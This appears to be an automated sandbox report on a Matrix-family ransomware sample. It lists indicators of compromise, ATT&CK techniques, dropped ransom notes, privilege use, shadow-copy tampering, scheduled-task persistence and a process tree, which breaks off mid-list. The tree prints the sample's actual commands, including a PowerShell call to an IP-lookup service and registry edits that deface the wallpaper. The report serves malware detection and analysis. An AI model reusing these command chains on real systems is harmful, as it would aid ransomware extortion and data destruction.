File opened (read-only)	\??\G:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\O:	0AePg1f964.exe
File opened (read-only)	\??\K:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\A:	0AePg1f964.exe
File opened (read-only)	\??\J:	0AePg1f964.exe
File opened (read-only)	\??\M:	0AePg1f964.exe
File opened (read-only)	\??\W:	0AePg1f964.exe
File opened (read-only)	\??\Y:	0AePg1f964.exe
File opened (read-only)	\??\X:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\E:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\G:	0AePg1f964.exe
File opened (read-only)	\??\K:	0AePg1f964.exe
File opened (read-only)	\??\L:	0AePg1f964.exe
File opened (read-only)	\??\X:	0AePg1f964.exe
File opened (read-only)	\??\L:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\P:	0AePg1f964.exe
File opened (read-only)	\??\V:	0AePg1f964.exe
File opened (read-only)	\??\Z:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\U:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\Q:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\N:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\N:	0AePg1f964.exe
File opened (read-only)	\??\S:	0AePg1f964.exe
File opened (read-only)	\??\U:	0AePg1f964.exe
File opened (read-only)	\??\Y:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\V:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\J:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\I:	0AePg1f964.exe
File opened (read-only)	\??\P:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\R:	0AePg1f964.exe
File opened (read-only)	\??\H:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\B:	0AePg1f964.exe
File opened (read-only)	\??\E:	0AePg1f964.exe
File opened (read-only)	\??\H:	0AePg1f964.exe
File opened (read-only)	\??\S:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\O:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\M:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\I:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

146 myexternalip.com

flow	ioc
146	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\IcsOaFkp.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

description	ioc	process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Grace-ul-oob.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-pl.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\resources.pak	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\as.pak	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\Other.DATA	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\kk.pak	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\dynalink.md	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\AdjacencyLetter.dotx	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ky.txt	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Grace-ppd.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\office.x-none.msi.16.x-none.tree.dat	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\msedge_100_percent.pak.DATA	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\dom.md	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-fr_fr_2x.gif	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN022.XML	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sql90.xsl	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_super.gif	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\wordmui.msi.16.en-us.vreg.dat	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sign-in.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge.dll.sig	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Trial-ul-oob.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\SPPRedist.msi	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner.svg	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_OEM_Perp-pl.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Redact_R_RHP.aapp	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig.DATA	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\LyncVDI_Eula.txt	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\proof.fr-fr.msi.16.fr-fr.vreg.dat	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons_2x.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\gd.pak.DATA	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ul-oob.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\et_get.svg	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\sfs_icons.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Trial-ul-oob.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\jdk\freebxml.md	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

6420 schtasks.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

7028 vssadmin.exe
5904 vssadmin.exe

pid	process
6420	schtasks.exe

pid	process
7028	vssadmin.exe
5904	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

powershell.exe0AePg1f964.exepowershell.exe

pid	process
2748	powershell.exe
2748	powershell.exe
2748	powershell.exe
5816	0AePg1f964.exe
5816	0AePg1f964.exe
5816	0AePg1f964.exe
5816	0AePg1f964.exe
5816	0AePg1f964.exe
5816	0AePg1f964.exe
5816	0AePg1f964.exe
5816	0AePg1f964.exe
5816	0AePg1f964.exe
5816	0AePg1f964.exe
5816	0AePg1f964.exe
9660	powershell.exe
9660	powershell.exe
9660	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

0AePg1f964.exe

pid process

5816 0AePg1f964.exe

pid	process
5816	0AePg1f964.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

Processes:

powershell.exetakeown.exe0AePg1f964.exevssvc.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeTakeOwnershipPrivilege	1432	takeown.exe
Token: SeDebugPrivilege	5816	0AePg1f964.exe
Token: SeLoadDriverPrivilege	5816	0AePg1f964.exe
Token: SeBackupPrivilege	5256	vssvc.exe
Token: SeRestorePrivilege	5256	vssvc.exe
Token: SeAuditPrivilege	5256	vssvc.exe
Token: SeIncreaseQuotaPrivilege	6696	WMIC.exe
Token: SeSecurityPrivilege	6696	WMIC.exe
Token: SeTakeOwnershipPrivilege	6696	WMIC.exe
Token: SeLoadDriverPrivilege	6696	WMIC.exe
Token: SeSystemProfilePrivilege	6696	WMIC.exe
Token: SeSystemtimePrivilege	6696	WMIC.exe
Token: SeProfSingleProcessPrivilege	6696	WMIC.exe
Token: SeIncBasePriorityPrivilege	6696	WMIC.exe
Token: SeCreatePagefilePrivilege	6696	WMIC.exe
Token: SeBackupPrivilege	6696	WMIC.exe
Token: SeRestorePrivilege	6696	WMIC.exe
Token: SeShutdownPrivilege	6696	WMIC.exe
Token: SeDebugPrivilege	6696	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6696	WMIC.exe
Token: SeRemoteShutdownPrivilege	6696	WMIC.exe
Token: SeUndockPrivilege	6696	WMIC.exe
Token: SeManageVolumePrivilege	6696	WMIC.exe
Token: 33	6696	WMIC.exe
Token: 34	6696	WMIC.exe
Token: 35	6696	WMIC.exe
Token: 36	6696	WMIC.exe
Token: SeIncreaseQuotaPrivilege	6696	WMIC.exe
Token: SeSecurityPrivilege	6696	WMIC.exe
Token: SeTakeOwnershipPrivilege	6696	WMIC.exe
Token: SeLoadDriverPrivilege	6696	WMIC.exe
Token: SeSystemProfilePrivilege	6696	WMIC.exe
Token: SeSystemtimePrivilege	6696	WMIC.exe
Token: SeProfSingleProcessPrivilege	6696	WMIC.exe
Token: SeIncBasePriorityPrivilege	6696	WMIC.exe
Token: SeCreatePagefilePrivilege	6696	WMIC.exe
Token: SeBackupPrivilege	6696	WMIC.exe
Token: SeRestorePrivilege	6696	WMIC.exe
Token: SeShutdownPrivilege	6696	WMIC.exe
Token: SeDebugPrivilege	6696	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6696	WMIC.exe
Token: SeRemoteShutdownPrivilege	6696	WMIC.exe
Token: SeUndockPrivilege	6696	WMIC.exe
Token: SeManageVolumePrivilege	6696	WMIC.exe
Token: 33	6696	WMIC.exe
Token: 34	6696	WMIC.exe
Token: 35	6696	WMIC.exe
Token: 36	6696	WMIC.exe
Token: SeDebugPrivilege	9660	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.execmd.execmd.execmd.exewscript.execmd.execmd.execmd.execmd.exe0AePg1f9.execmd.exe

description	pid	process	target process
PID 2876 wrote to memory of 220	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 2876 wrote to memory of 220	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 2876 wrote to memory of 220	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 2876 wrote to memory of 2232	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	NWpi5HfZ.exe
PID 2876 wrote to memory of 2232	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	NWpi5HfZ.exe
PID 2876 wrote to memory of 2232	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	NWpi5HfZ.exe
PID 2876 wrote to memory of 3372	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 2876 wrote to memory of 3372	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 2876 wrote to memory of 3372	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 3372 wrote to memory of 2748	3372	cmd.exe	powershell.exe
PID 3372 wrote to memory of 2748	3372	cmd.exe	powershell.exe
PID 3372 wrote to memory of 2748	3372	cmd.exe	powershell.exe
PID 2876 wrote to memory of 1044	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 2876 wrote to memory of 1044	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 2876 wrote to memory of 1044	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 2876 wrote to memory of 768	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 2876 wrote to memory of 768	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 2876 wrote to memory of 768	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 768 wrote to memory of 5896	768	cmd.exe	wscript.exe
PID 768 wrote to memory of 5896	768	cmd.exe	wscript.exe
PID 768 wrote to memory of 5896	768	cmd.exe	wscript.exe
PID 2876 wrote to memory of 6072	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 2876 wrote to memory of 6072	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 2876 wrote to memory of 6072	2876	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1044 wrote to memory of 7396	1044	cmd.exe	reg.exe
PID 1044 wrote to memory of 7396	1044	cmd.exe	reg.exe
PID 1044 wrote to memory of 7396	1044	cmd.exe	reg.exe
PID 5896 wrote to memory of 5660	5896	wscript.exe	cmd.exe
PID 5896 wrote to memory of 5660	5896	wscript.exe	cmd.exe
PID 5896 wrote to memory of 5660	5896	wscript.exe	cmd.exe
PID 1044 wrote to memory of 6524	1044	cmd.exe	reg.exe
PID 1044 wrote to memory of 6524	1044	cmd.exe	reg.exe
PID 1044 wrote to memory of 6524	1044	cmd.exe	reg.exe
PID 1044 wrote to memory of 5844	1044	cmd.exe	reg.exe
PID 1044 wrote to memory of 5844	1044	cmd.exe	reg.exe
PID 1044 wrote to memory of 5844	1044	cmd.exe	reg.exe
PID 6072 wrote to memory of 9160	6072	cmd.exe	attrib.exe
PID 6072 wrote to memory of 9160	6072	cmd.exe	attrib.exe
PID 6072 wrote to memory of 9160	6072	cmd.exe	attrib.exe
PID 5660 wrote to memory of 6420	5660	cmd.exe	schtasks.exe
PID 5660 wrote to memory of 6420	5660	cmd.exe	schtasks.exe
PID 5660 wrote to memory of 6420	5660	cmd.exe	schtasks.exe
PID 6072 wrote to memory of 7468	6072	cmd.exe	cacls.exe
PID 6072 wrote to memory of 7468	6072	cmd.exe	cacls.exe
PID 6072 wrote to memory of 7468	6072	cmd.exe	cacls.exe
PID 5896 wrote to memory of 7804	5896	wscript.exe	cmd.exe
PID 5896 wrote to memory of 7804	5896	wscript.exe	cmd.exe
PID 5896 wrote to memory of 7804	5896	wscript.exe	cmd.exe
PID 7804 wrote to memory of 7180	7804	cmd.exe	schtasks.exe
PID 7804 wrote to memory of 7180	7804	cmd.exe	schtasks.exe
PID 7804 wrote to memory of 7180	7804	cmd.exe	schtasks.exe
PID 6072 wrote to memory of 1432	6072	cmd.exe	takeown.exe
PID 6072 wrote to memory of 1432	6072	cmd.exe	takeown.exe
PID 6072 wrote to memory of 1432	6072	cmd.exe	takeown.exe
PID 6072 wrote to memory of 9912	6072	cmd.exe	cmd.exe
PID 6072 wrote to memory of 9912	6072	cmd.exe	cmd.exe
PID 6072 wrote to memory of 9912	6072	cmd.exe	cmd.exe
PID 9912 wrote to memory of 3416	9912	cmd.exe	0AePg1f9.exe
PID 9912 wrote to memory of 3416	9912	cmd.exe	0AePg1f9.exe
PID 9912 wrote to memory of 3416	9912	cmd.exe	0AePg1f9.exe
PID 3416 wrote to memory of 5816	3416	0AePg1f9.exe	0AePg1f964.exe
PID 3416 wrote to memory of 5816	3416	0AePg1f9.exe	0AePg1f964.exe
PID 6120 wrote to memory of 7028	6120	cmd.exe	vssadmin.exe
PID 6120 wrote to memory of 7028	6120	cmd.exe	vssadmin.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

9160 attrib.exe

pid	process
9160	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"
1⤵
- Matrix Ransomware
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2876
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWpi5HfZ.exe"
  2⤵
  PID:220
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWpi5HfZ.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWpi5HfZ.exe" -n
  2⤵
  - Executes dropped EXE
  PID:2232
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\jP0Eg5Gr.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3372
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IcsOaFkp.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1044
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IcsOaFkp.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:7396
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:6524
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:5844
- C:\Windows\SysWOW64\cmd.exe
